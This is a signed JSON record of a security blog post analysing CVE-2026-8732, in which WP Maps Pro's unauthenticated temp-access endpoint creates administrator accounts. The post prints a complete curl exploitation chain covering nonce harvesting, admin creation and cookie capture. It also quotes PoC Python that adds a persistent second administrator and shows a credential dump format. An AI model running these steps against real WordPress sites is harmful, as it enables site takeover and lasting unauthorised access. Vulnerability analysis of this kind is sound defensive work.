-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

NEFARIOUSPLAN-CANONICAL-V1
{"body_md":"## The `is_admin()` wrapper is not a check\n\nThe hook registration in `wp-google-map-gold.php`:\n\n```php\nif ( is_admin() ) {\n    add_action( 'wp_ajax_wpgmp_temp_access_ajax',\n                [ $this, 'wpgmp_temp_access_ajax_callback' ] );\n    add_action( 'wp_ajax_nopriv_wpgmp_temp_access_ajax',\n                [ $this, 'wpgmp_temp_access_ajax_callback' ] );\n}\n```\n\nThe `is_admin()` guard reads defensively. It is not. `is_admin()` in WordPress returns true for any request that lands on `/wp-admin/admin-ajax.php`, regardless of whether the caller is authenticated. The function asks \"is the code running in the admin area,\" not \"is the caller an administrator.\" The condition is satisfied by anyone hitting the AJAX endpoint, which is precisely what `wp_ajax_nopriv_` is designed to route to. This is one of the older WordPress footguns: a defensive-looking name attached to a function that does not check the property its name suggests.\n\nSo the registration block runs on every admin-ajax request, and inside it, the second `add_action` declares that `wpgmp_temp_access_ajax_callback` should handle the request when there is no logged-in user. This is the WordPress idiom for \"expose this handler to anonymous callers.\" The plugin reaches for it by name.\n\nThe handler body, in the same file:\n\n```php\nfunction wpgmp_temp_access_ajax_callback() {\n    check_ajax_referer( 'fc-call-nonce', 'nonce' );\n    $temp_access = new WPGMP_Temp_Access();\n    $response = $temp_access->wpgmp_temp_access_support();\n    wp_send_json( $response );\n}\n```\n\n`check_ajax_referer` calls `wp_verify_nonce` under the hood. There is no `is_user_logged_in()` and no `current_user_can()` before or after. The nonce check is the only gate. The handler then instantiates a class called `WPGMP_Temp_Access` and invokes `wpgmp_temp_access_support`. The names are honest about what the feature is.\n\n## The nonce is on every public page\n\n`wp_localize_script` is the WordPress mechanism for passing PHP values into a JavaScript context. When the plugin's main frontend script enqueues, the plugin emits an inline `<script>` block defining the `wpgmp_local` object. From `classes/wpgmp-helper.php`:\n\n```php\n$wpgmp_local = [\n    'urlforajax' => admin_url( 'admin-ajax.php' ),\n    'nonce'      => wp_create_nonce( 'fc-call-nonce' ),\n    // ...\n];\nwp_localize_script( 'wpgmp-google-map-main', 'wpgmp_local', $wpgmp_local );\n```\n\nThe script is enqueued on every frontend page that the plugin considers map-relevant: any page or post that embeds a map widget, the homepage if the theme renders a map in its header, the blog feed depending on theme. On a site running WP Maps Pro the script is, in practice, on most pages. The PoC's nonce-harvest worker checks the homepage, contact pages, sitemap entries, the WordPress REST API listing of posts and pages, the RSS feed, and a brute-force range of `?p=N` and `?page_id=N` query strings. The exhaustive crawl is overkill in most cases; the nonce is usually on the front page.\n\n`wp_create_nonce( 'fc-call-nonce' )` against an unauthenticated request computes the nonce for WordPress user ID 0, the anonymous identity. The `check_ajax_referer` call in the handler runs against the same user ID 0 with the same action string. The two values match. The check returns 1.\n\nWordPress nonces are CSRF tokens. They prove a request was minted by this server for this action within the last 24 hours. They do not prove anything about who minted it. The pattern this exhibits has [its own catalog page](/patterns/nonce-is-not-auth) and seven prior posts before this one, including the canonical walk-through on [Pix for WooCommerce](/posts/pix-woocommerce-nonce-is-not-auth), the inline-nonce variant on [midi-Synth](/posts/midi-synth-empty-api-key-is-the-payload), and the two-character `check_ajax_referer` patch on [vczapi for Zoom](/posts/vczapi-cve-2026-1368-patch-is-two-characters). WP Maps Pro 6.1.0 is the eighth exhibit. What this exhibit adds is described below.\n\n## The handler creates an administrator. With the vendor's email.\n\nInside `WPGMP_Temp_Access::wpgmp_temp_access_support`, from `classes/wpgmp-temp-access.php`:\n\n```php\nif ( isset( $_POST['check_temp'] ) && $_POST['check_temp'] == 'false' ) {\n    $username = 'fc_user_' . uniqid();\n    $email    = 'support@flippercode.com';\n    $role     = 'administrator';\n\n    $result = self::fc_create_new_user( $username, $email, $role );\n\n    if ( is_numeric( $result ) ) {\n        $access_link = self::generate_login_link( $result );\n        $response['url'] = $access_link;\n    }\n}\n```\n\nThree of these four lines are constants in the plugin source. The username prefix is `fc_user_`, a literal string concatenated with `uniqid()`. The email is the literal string `support@flippercode.com`. The role is the literal string `administrator`. The caller supplies one byte of meaningful input, the `check_temp` POST field, set to `'false'`. Every other input the function uses is hardcoded.\n\n`fc` is the vendor abbreviation. The plugin is published by Flippercode, since rebranded to WePlugins, but the source still ships under the `fc-*` and `wpgmp_*` namespaces from the Flippercode era. `support@flippercode.com` is the vendor's support inbox. `fc_user_*` is the username convention the vendor's own support team is intended to use when logging into customer sites.\n\nThis is the design of the feature, made literal in the code: a customer files a support ticket, the support technician needs administrator access on the customer's site to investigate, the technician hits `wpgmp_temp_access_ajax?check_temp=false`, the plugin creates a temporary administrator account labeled `fc_user_<uniqid>` with the support team's email, and returns a single-use-looking URL the technician can browse to. The feature is a vendor-support backdoor by design, not by accident.\n\nThe function is `fc_create_new_user` and it calls `wp_insert_user` underneath. The account is real. It persists in `wp_users`. It carries the `administrator` role in `wp_usermeta`. It survives the request, the session, the page reload, and the plugin's deactivation.\n\n## The magic URL replaces the session\n\n`generate_login_link` returns a URL of the shape `https://target.com/wp-admin/?wpgmp_token=<128-hex>`. The token is stored on the user record. The plugin's `init` hook reads `$_GET['wpgmp_token']` on every request:\n\n```php\nfunction wpgmp_access_token_check() {\n    if ( ! empty( $_GET['wpgmp_token'] ) ) {\n        $temp_access->get_valid_user_based_on_wpgmp_token( $wpgmp_access_token );\n    }\n}\n```\n\nInside `get_valid_user_based_on_wpgmp_token`:\n\n```php\nwp_set_current_user( $temporary_user_id, $temporary_user_login );\nwp_set_auth_cookie( $temporary_user_id );\nwp_safe_redirect( admin_url() );\n```\n\n`wp_set_auth_cookie` writes the `wordpress_logged_in_*` cookie tied to the fc_user account. The browser holds that cookie. The redirect lands on `/wp-admin/`. The user-agent and IP that browsed to the magic URL are now an administrator of the WordPress site for the lifetime of the cookie, which is fourteen days by default. The full request sequence from a cold visitor:\n\n```bash\n# Step 1: harvest the nonce from any public page.\ncurl -s 'https://target.com/' \\\n  | grep -oE 'wpgmp_local\\s*=\\s*\\{[^}]*\"nonce\":\"[a-f0-9]+\"' \\\n  | grep -oE '[a-f0-9]{8,15}'\n# 7a1f3d8b2c\n\n# Step 2: create the administrator.\ncurl -s -X POST 'https://target.com/wp-admin/admin-ajax.php' \\\n  -d 'action=wpgmp_temp_access_ajax' \\\n  -d 'nonce=7a1f3d8b2c' \\\n  -d 'check_temp=false'\n# {\"url\":\"https://target.com/wp-admin/?wpgmp_token=8c4a...<128 hex>\"}\n\n# Step 3: redeem the magic URL and capture the auth cookie.\ncurl -s -c cookies.txt -L 'https://target.com/wp-admin/?wpgmp_token=8c4a...'\n# 200, redirected to /wp-admin/, cookies.txt now contains\n# wordpress_logged_in_<hash>=fc_user_<uniqid>|...\n```\n\nThe PoC ends this phase by verifying that `GET /wp-admin/users.php` returns 200 with no redirect to `wp-login.php`. The verification is mechanical. Once the cookie is set, WordPress treats the holder as the administrator the cookie names.\n\n## The cleanup endpoint shows the loop the vendor intended\n\nThe handler accepts a second value for `check_temp`. From the PoC's `cleanup_fc_user`:\n\n```python\nsess.post(base + \"/wp-admin/admin-ajax.php\",\n    data={\"action\": \"wpgmp_temp_access_ajax\",\n          \"nonce\": nonce,\n          \"check_temp\": \"true\"})\n```\n\nWhen `check_temp=true`, the handler removes the existing `fc_user_*` account. The PoC scanner calls cleanup before every exploitation attempt because the create branch fails with an \"email already exists\" error if a previous fc_user has not been removed, which happens when another attacker, or the real Flippercode support team, has been on the site recently and not called cleanup.\n\nThe cleanup branch is testimony. The vendor's intended workflow is \"create the temp admin, do the work, call cleanup to remove the account.\" The endpoint exists because the vendor designed for it to be called. The same endpoint the PoC uses to clear traces is the endpoint Flippercode's support team is expected to call when a ticket closes. This is trust-inversion at the vendor-customer boundary: the path the customer trusts the vendor to walk (file a ticket, get help, walk away) is, byte for byte, the path an unauthenticated visitor walks to install themselves as administrator. The control plane the vendor built for their own access is the control plane the attacker uses.\n\nAn attacker is not required to call cleanup. The PoC explicitly does not, after the exploitation succeeds: the magic URL has been used, the auth cookie has been set, the fc_user account remains in the database. After CVE-2026-8732 exploitation, every affected site carries a persistent WordPress administrator whose email is `support@flippercode.com`. A site owner auditing the users page weeks later sees a user with the vendor's email and a vendor-conventional username prefix and is likely to read the account as legitimate vendor support.\n\n## The second administrator is the persistence\n\nThe PoC's final phase, run from inside the new admin session, calls the WordPress REST API to create a second administrator:\n\n```python\nr = sess.post(\n    f\"{base}/wp-json/wp/v2/users\",\n    headers={\"X-WP-Nonce\": rest_nonce, \"Content-Type\": \"application/json\"},\n    json={\"username\": uname, \"password\": pwd, \"email\": email,\n          \"roles\": [\"administrator\"]},\n)\n```\n\nThis step uses the standard WordPress REST API with the admin's session and a rest-nonce minted for that session. There is no vulnerability in this step. It is the operator's persistence move: even if the site owner notices `fc_user_*` and removes it, the secondary `shadow_*` account remains, with credentials the operator chose and saved to a local `pwned.txt` file. The cleanup the vendor designed for their own support workflow does not touch the second admin.\n\nThe output format is fixed in the PoC:\n\n```\n1.\n=======================================================\nTarget    : https://target.com/wp-admin/\nUser      : shadow_xxxxx\nPass      : Xk9#mQ2pLrTv8nYw\nEmail     : xxxxx@xxxx.com\nMagic     : https://target.com/wp-admin/?wpgmp_token=...\n=======================================================\n\nCookies :\n\n=======================================================\nwordpress_logged_in_...=fc_user_...\n=======================================================\n```\n\nTwo administrator credentials per compromised site, one cookie, one magic URL, one numbered record per host, written with append-only semantics so the file grows across runs. The author's display name on the PoC is \"shadow ♡ & friska.\" The username prefix for the persistence step is `shadow_*`. The output file is `pwned.txt`. The architecture is a 1-to-50 thread pool against a target list, with a parallel nonce crawler that hits the REST API, the sitemap, the RSS feed, and a `?p=N` enumeration before falling back. None of these are the choices of a researcher reproducing a single finding.\n\n## What WP Maps Pro adds to the catalog\n\nThe nonce-is-not-auth pattern has been documented through [Pix for WooCommerce](/posts/pix-woocommerce-nonce-is-not-auth), [midi-Synth](/posts/midi-synth-empty-api-key-is-the-payload), [vczapi for Zoom](/posts/vczapi-cve-2026-1368-patch-is-two-characters), [DnD Multiple File Upload for CF7](/posts/dnd-cf7-cve-2026-5718-nonce-mint-blocks-curl), and [ScriptCase](/posts/scriptcase-cve-2025-47227-page-load-was-the-gate). The structural shape is constant: a handler registered via `wp_ajax_nopriv_*`, a `check_ajax_referer` or `wp_verify_nonce` call at the top, no `current_user_can`, a privileged operation in the body. The nonce confirms the caller could read a page on this server. The handler reads it as confirming who the caller is.\n\nWP Maps Pro is the eighth exhibit, and the mechanism is the catalog's standard mechanism. What this exhibit adds is the explicit intent of the privileged operation. The Pix for WooCommerce handler wrote uploaded files to a webroot certificate directory; the developer's stated intent was certificate management, not admin account creation, and the file-write-to-execution-path was the unintended consequence. The WP Maps Pro handler creates an admin account; the developer's stated intent was admin account creation. The privilege escalation is not a side effect. It is the function the handler was written to perform.\n\nA handler whose entire purpose is to grant administrator-level access cannot be made safe by gating it with a CSRF token. The CSRF token's job is to confirm the request originated from a page this server served. Every page this server serves contains the token. The set of callers who can present the token is the set of visitors who can load any frontend page. The set of visitors who can load any frontend page is the set of visitors who can reach the site. The CSRF token, applied to an administrator-creation endpoint, gates exactly one thing: that the caller has visited the site once.\n\nThe plugin source is not in the WordPress.org repository; WP Maps Pro is sold under a commercial license, and the temp-access feature lives in the paid release rather than the free `wp-google-map-gold` slug. The patched version, per the PoC's README and the Wordfence advisory citation, is 6.1.1. Whether 6.1.1 deletes the feature or adds an authentication step that prevents the feature's original use, the patch is an admission that the design was a backdoor: the only way to make this endpoint safe is to break the workflow that justified writing it.\n\nPoC: [xShadow-Here/CVE-2026-8732](https://github.com/xShadow-Here/CVE-2026-8732)","closing_line":"The feature does exactly what the vendor designed it to do. The vendor designed it to issue administrator credentials to whoever asks.","hook_md":"WP Maps Pro 6.1.0 ships a handler called `wpgmp_temp_access_ajax_callback`. The handler is registered via `wp_ajax_nopriv_wpgmp_temp_access_ajax`, callable without a session. Its first action is `check_ajax_referer( 'fc-call-nonce', 'nonce' )`. Its second action is to construct a WordPress administrator whose email is hardcoded as `support@flippercode.com` and return a magic login URL the caller can browse to.\n\nThe `fc-call-nonce` value is printed inline on every public page of the site as the `nonce` field of the `wpgmp_local` JavaScript object. CVE-2026-8732 is the chain a visitor walks from the homepage of an affected site to a `wordpress_logged_in_*` cookie tied to a freshly minted administrator account that carries the plugin vendor's support email.","post_id":527,"slug":"wp-maps-pro-cve-2026-8732-temp-access-creates-admins","title":"CVE-2026-8732: WP Maps Pro's Temp-Access Endpoint Creates Administrators. The Vendor's Email Is Hardcoded.","type":"initial","unreadable_sentence":"A handler whose entire purpose is to grant administrator-level access cannot be made safe by gating it with a CSRF token."}
-----BEGIN PGP SIGNATURE-----

iHUEARYIAB0WIQRf0htP5+SjynlxywneZjl4jgkQJgUCahqR9QAKCRDeZjl4jgkQ
Jof6AQD0mQkY60iKJOFD2De777VxRt1f0iiJf+StxHb680B4lgEAjTwDq3wJN8xH
V0DOXuibRc5s3IFjix/+JCzz2PCbBAM=
=ljeV
-----END PGP SIGNATURE-----